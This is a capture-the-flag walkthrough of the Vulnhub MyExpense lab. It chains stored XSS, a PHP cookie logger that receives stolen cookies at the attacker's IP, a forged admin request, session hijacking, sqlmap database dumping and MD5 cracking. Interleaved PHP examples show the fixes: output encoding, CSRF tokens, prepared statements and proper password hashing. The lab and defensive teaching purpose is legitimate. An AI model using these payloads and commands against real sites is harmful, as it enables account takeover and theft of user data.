Where Notes Work
Vulnhub [MyExpense] [Walkthrough]
SCENARIO
Note that the password of Samuel's account is fzghn4lw, and once the challenge is done, the flag will be displayed in the application under Samuel's account.
What we have to do first is log in to Samuel's account and send the expense report to the manager.
Machine IP: 192.168.43.167
Finding open ports and services using Nmap.
As we can see, there is one open port, which is running a website, and there is a robots.txt file referring to the "/admin/admin.php" path.
Visiting the website, we can see a Welcome box explaining how the MyExpense application works. After reading it we understand that the manager and then the financial approver have to validate the expense request of any employee.
If we try to log in to Samuel's account it shows "Your account has been locked or is inactive. Please contact the administrator team". Going to "/admin/admin.php", we can see a dashboard of inactive and active accounts, and Samuel's account is inactive. If we try to activate it, it shows "Error 401 – Unauthorized", which means we cannot do this ourselves.
Let's click on "Don't have an account?" and create one to check for an XSS vulnerability. If we click on the Sign-up button it turns out the button is disabled; enable it from Inspect Element by changing the attribute to enabled="", see picture below.
After sign-up, visiting "/admin/admin.php" shows that our code gets executed, so we find that the page is vulnerable to (stored) XSS.
Now we will try to steal cookies using a small PHP script. Create a file named cookie.php inside "/var/www/html/", see the cookie.php code below.
<?php
$cookie = $_GET['cmd'];
$file = fopen('log.txt','a');
fwrite($file,$cookie."\n");
?>
After that, stop the Apache server and start PHP's built-in server in a terminal (192.168.43.225 is the attacker machine's local IP):
root@prokunal:~# php -S 192.168.43.225:80
Then we create another dummy account, this time with a cookie-stealer script as the payload.
The cookie-stealer script to submit is below:
<script>document.write('<img src="http://192.168.43.225/cookie.php?cmd='+document.cookie+'" />');</script>
See picture below.
After creating the account, if we visit the "/admin/admin.php" page we can see that we are receiving the cookie values.
After that, we try to copy the received cookie value into our own session, then refresh the page. Now it shows "Sorry, as an administrator, you can be authenticated only once a time." For changing the cookie value, I am using the Firefox add-on "Cookie Editor".
So we cannot reuse the cookie value, but from that message we see that the request is being made as an administrator. So what if we try to activate Samuel's account through the XSS vulnerability? Let's try.
As a non-admin user, if we try to activate Samuel's account it shows "Error 401 – Unauthorized". Just copy the link that the activate button sends:
Link: 192.168.43.167/admin/admin.php?id=11&status=active
Now we will try to make that request as the administrator to activate Samuel's account. To do this we will use the script below (no PHP server is needed this time, since the request goes to the target itself):
<script>document.write('<img src="http://192.168.43.167/admin/admin.php?id=11&status=active" />');</script>
Let's create another account, paste the script and sign up.
After sign-up, go to the "/admin/admin.php" page; now you can see that Samuel's account is active.
Now let's log in to Samuel's account and go to the Expense Report page.
As we can see there is an open expense report. Click on the green button and submit it, but it's not over yet: as we saw on the Welcome page, Samuel's manager has to accept this report, and after that the financial approver. So let's see who Samuel's manager is; going to Samuel's profile shows that the manager is Manon Riviere.
Now we have to access Manon Riviere's account to accept Samuel's expense report.
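The activation above works because admin.php changes an account's state on a plain GET, and the administrator's browser issues that GET as soon as it renders the stored <img> tag while carrying the admin's session cookie. The following is an added example, not MyExpense's own code (which I have not seen): it shows that pattern in minimal PHP next to a hardened handler that accepts only POST, requires a per-session CSRF token and re-checks the role on the server. The function and field names (activate_vulnerable, activate_hardened, csrf_token, the role key in the session) are assumptions.

```php
<?php
// Added example, not MyExpense's code. Names (activate_vulnerable, activate_hardened,
// csrf_token, $session['role']) are assumptions made for illustration.
declare(strict_types=1);

// --- vulnerable pattern: state change on GET, relying on the session cookie alone ---
function activate_vulnerable(array $get, array $session): string {
    if (($session['role'] ?? '') !== 'admin') {
        return '401 Unauthorized';
    }
    // Any page the admin merely views can trigger this via <img src="admin.php?id=11&status=active">
    return "user {$get['id']} set to {$get['status']}";
}

// --- hardened handler ---
function csrf_token(array &$session): string {
    // one random token per session, kept server-side and echoed into the admin's form
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

function activate_hardened(string $method, array $post, array $session): string {
    if ($method !== 'POST') {
        return '405 Method Not Allowed';          // a GET from an <img> tag never gets past this line
    }
    if (($session['role'] ?? '') !== 'admin') {
        return '401 Unauthorized';                // authorization checked on the server for every request
    }
    $sent = (string)($post['csrf'] ?? '');
    if (!isset($session['csrf']) || !hash_equals($session['csrf'], $sent)) {
        return '403 Forbidden (bad CSRF token)';  // a forged request cannot supply the right token
    }
    $id     = filter_var($post['id'] ?? '', FILTER_VALIDATE_INT);
    $status = $post['status'] ?? '';
    if ($id === false || !in_array($status, ['active', 'inactive'], true)) {
        return '400 Bad Request';                 // only known values reach the database
    }
    return "user {$id} set to {$status}";
}

// Demonstration with constructed inputs: the admin's session as the browser would carry it.
$adminSession = ['role' => 'admin'];
echo activate_vulnerable(['id' => '11', 'status' => 'active'], $adminSession), "\n";   // "user 11 set to active": the <img> trick works

$token = csrf_token($adminSession);
echo activate_hardened('GET', [], $adminSession), "\n";                                                   // 405
echo activate_hardened('POST', ['id' => '11', 'status' => 'active'], $adminSession), "\n";                // 403, no token
echo activate_hardened('POST', ['id' => '11', 'status' => 'active', 'csrf' => $token], $adminSession), "\n"; // "user 11 set to active"
```

One caveat worth noting for this box: the forged request is triggered by a script stored on the same origin as admin.php, so SameSite cookies and Referer checks do not help here, and a script running on the admin page could in principle read the token out of the form. The POST-plus-token requirement stops the <img> variant shown above; the root fix is still encoding the user-supplied fields before they are rendered to the administrator.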
On the homepage of Samuel's account there is a "Post a new message" box; let's check whether it is vulnerable to XSS.
As we can see, yes, it is vulnerable to XSS. Let's try to steal the cookie values of other users; for this we follow the same steps as before.
Note: you can rename cookie.php to cookie-stealer.php or anything else, but then change the name in the script tag as well.
So create a file named cookie.php inside the "/var/www/html/" folder and start the PHP server with "php -S <local ip>:80"; see the cookie.php code below.
<?php
$cookie = $_GET['cmd'];
$file = fopen('log.txt','a');
fwrite($file,$cookie."\n");
?>
After that, we post the script as a message; see the script below.
After that, we can see that we are receiving the cookie values.
Now we will try the received cookie values one by one and see whether we get the account of Samuel's manager, Manon Riviere.
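Both injection points used so far (the sign-up name rendered on the admin dashboard and the message box on the home page) fail the same way: user-supplied text is written into HTML unencoded, and the session cookie is readable from document.cookie. The block below is an added example, not MyExpense's code; it renders the page's own payload through a vulnerable and a hardened output function, and shows the session-cookie settings under which the stealer would log nothing even if a script did run. The function names and the table-cell layout are assumptions.

```php
<?php
// Added example, not MyExpense's code. render_vulnerable, render_safe and
// harden_session_cookie are assumed names; the sample inputs are constructed.
declare(strict_types=1);

// Values as an account holder might submit them (the first is the page's own payload).
$samples = [
    'sign-up name' => '<script>document.write(\'<img src="http://192.168.43.225/cookie.php?cmd=\'+document.cookie+\'" />\');</script>',
    'message'      => 'Lunch receipt <b>attached</b>',
];

// Vulnerable: untrusted data is concatenated straight into the HTML, so the browser of
// whoever views the page (here, the administrator) executes whatever was typed.
function render_vulnerable(string $label, string $value): string {
    return "<td>$label</td><td>$value</td>";
}

// Hardened: encode for the HTML context at output time. ENT_QUOTES also encodes the single
// quote so the value is safe inside quoted attributes; ENT_SUBSTITUTE avoids returning an
// empty string on invalid UTF-8, which would otherwise hide data from the admin.
function render_safe(string $label, string $value): string {
    $enc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<td>' . $enc($label) . '</td><td>' . $enc($value) . '</td>';
}

foreach ($samples as $label => $value) {
    echo "vulnerable: ", render_vulnerable($label, $value), "\n";
    echo "hardened:   ", render_safe($label, $value), "\n\n";
}

// Session cookie flags. With HttpOnly set, document.cookie no longer contains PHPSESSID,
// so the stealer's log.txt would receive an empty line instead of a usable session.
// Must run before session_start().
function harden_session_cookie(): void {
    session_set_cookie_params([
        'httponly' => true,      // not readable from JavaScript
        'secure'   => true,      // only sent over HTTPS
        'samesite' => 'Strict',  // not sent on cross-site requests
        'path'     => '/',
    ]);
    ini_set('session.use_strict_mode', '1'); // reject session IDs the server did not issue itself
}
harden_session_cookie();
```

Running this prints the payload once as live markup and once with every < > " ' & turned into an entity; the second form is what the admin's browser should receive. HttpOnly is a second layer, not a substitute: a script that runs on the admin's page can still issue requests on the admin's behalf, which is exactly what the activation trick earlier in this walkthrough relies on.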
On the first try, I got the account of Ninette Thomas; after changing the cookie value 3-4 times, I finally got the account of Manon Riviere.
Now let's go to the Expense Reports page of Manon Riviere. We can see that Samuel's expense report is submitted but no action has been taken by Manon Riviere yet; click on the green button and accept it.
After that, the expense report has to be accepted by Manon Riviere's own manager, Paul Baudouin, the financial approver; you can see the manager's name on Manon's profile page.
Going to the Rennes page, we can see there is a database behind it, and looking at the URL (site.php?id=2) it looks vulnerable to SQL injection, so we will try to enumerate the database using sqlmap (preinstalled on Kali Linux).
It shows an error that we have to provide the right HTTP authentication type and valid credentials, so just copy the headers of the Manon Riviere session and its PHPSESSID cookie from the Network tab in Inspect Element, or use Burp Suite.
Dumping the tables using sqlmap; it asks yes/no questions along the way, answer no to all of them:
root@prokunal:~# sqlmap -u http://192.168.43.167/site.php?id=2 --headers="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --cookie="PHPSESSID=efk0etl8om09844b4fi5qcu392" --tables --dump
By dumping the tables we find the database "myexpense" and the table "user".
Now let's dump the data from the "user" table:
root@prokunal:~# sqlmap -u http://192.168.43.167/site.php?id=2 --headers="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --cookie="PHPSESSID=efk0etl8om09844b4fi5qcu392" -D myexpense -T user --dump
In the dump of the "user" table we find Paul's password as a hash.
Identifying the hash with hash-identifier, we find that it is MD5.
Let's crack the hash on CrackStation; here we find the password of Paul Baudouin.
Now let's log in to Paul's account using this password; we are now logged in as Paul Baudouin.
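sqlmap could read the whole "user" table through site.php because the id parameter ends up inside the SQL text. As an added example (not MyExpense's code; table and column names are assumptions, and an in-memory SQLite database stands in for MySQL so the script runs offline), here is the vulnerable query pattern next to the prepared-statement version that fixes it:

```php
<?php
// Added example, not MyExpense's code. Table/column names are assumptions; the in-memory
// SQLite database and all rows are constructed so the script runs without a server.
declare(strict_types=1);

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE site (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->exec("INSERT INTO site VALUES (1, 'Paris'), (2, 'Rennes')");
$db->exec("INSERT INTO user VALUES (1, 'paul', 'hash-placeholder')");   // constructed, not the real hash

// Vulnerable: the id parameter is spliced into the query string, so the caller controls the SQL.
function site_vulnerable(PDO $db, string $id): array {
    $sql = "SELECT name FROM site WHERE id = $id";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: validate the type first, then bind the value to a query whose shape is fixed at
// prepare time. The bound value can never become SQL syntax.
function site_safe(PDO $db, string $id): array {
    $n = filter_var($id, FILTER_VALIDATE_INT);
    if ($n === false) {
        return [];                                   // in a real handler: respond 400 and log it
    }
    $stmt = $db->prepare('SELECT name FROM site WHERE id = :id');
    $stmt->execute([':id' => $n]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$normal  = '2';
$payload = "2 UNION SELECT username || ':' || password FROM user";   // constructed injection string

print_r(site_vulnerable($db, $normal));    // ["Rennes"]
print_r(site_vulnerable($db, $payload));   // ["Rennes", "paul:hash-placeholder"]  <- other table leaked
print_r(site_safe($db, $normal));          // ["Rennes"]
print_r(site_safe($db, $payload));         // []  rejected before it reaches the database
```

With MySQL the only change is the DSN and, ideally, PDO::ATTR_EMULATE_PREPARES set to false so the server itself performs the binding. On the detection side, a single session requesting site.php with dozens of differently shaped id values in a few seconds (sqlmap's fingerprinting phase) is the pattern to alert on in the web server log.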
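CrackStation reverses Paul's hash instantly because it is a single unsalted MD5 digest, which is fast to compute and identical for every user who chose that password. This added example (not MyExpense's code; passwords and the user record are constructed) contrasts that storage with password_hash(), and shows how an existing MD5 column can be migrated at the next successful login without forcing resets:

```php
<?php
// Added example, not MyExpense's code. The password and stored values are constructed.
declare(strict_types=1);

// What the dump revealed: unsalted MD5, reversible by lookup table or brute force.
function store_md5(string $password): string {
    return md5($password);
}

// Hardened: a slow, salted, versioned hash. password_hash() generates a random salt per
// user and embeds algorithm, cost and salt in the string, so equal passwords hash differently.
function store_hashed(string $password): string {
    return password_hash($password, PASSWORD_DEFAULT);   // bcrypt at present, upgradeable later
}

function login(string $stored, string $attempt): bool {
    return password_verify($attempt, $stored);           // timing-safe comparison built in
}

$pw     = 'correct horse battery staple';                // constructed sample
$legacy = store_md5($pw);
$modern = store_hashed($pw);

echo "md5:    $legacy\n";                                // same 32 hex chars for every user with this password
echo "bcrypt: $modern\n";                                // $2y$10$... with a per-user random salt
var_dump(login($modern, $pw));                           // bool(true)
var_dump(login($modern, 'wrong'));                       // bool(false)

// Migration path for a table that still holds MD5 digests: verify against the legacy digest
// once, then overwrite the row with a proper hash. password_get_info() reports no algorithm
// for a string that password_hash() did not produce.
function login_migrating(string &$stored, string $attempt): bool {
    if (empty(password_get_info($stored)['algo'])) {     // legacy MD5 row
        if (!hash_equals($stored, md5($attempt))) {
            return false;
        }
        $stored = store_hashed($attempt);                // caller writes this back to the user table
        return true;
    }
    if (!password_verify($attempt, $stored)) {
        return false;
    }
    if (password_needs_rehash($stored, PASSWORD_DEFAULT)) {
        $stored = store_hashed($attempt);                // cost parameter raised since the row was written
    }
    return true;
}

$row = $legacy;
var_dump(login_migrating($row, $pw));                    // bool(true)
var_dump(strncmp($row, '$2y$', 4) === 0);                // bool(true): the row is now bcrypt
```

The migration function assumes the application can distinguish legacy rows by format; if the "user" table ever stored other non-password_hash() values in that column, add an explicit column for the hash scheme instead of relying on password_get_info().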
Now go to the Expense Reports page and accept Samuel's expense; for good measure, accept Manon Riviere's expense as well 😁😝
Now we are done. Log in to Samuel's account and go to the Expense Report page, and you will see this 🥳
let me know in the comment section if you face any problem.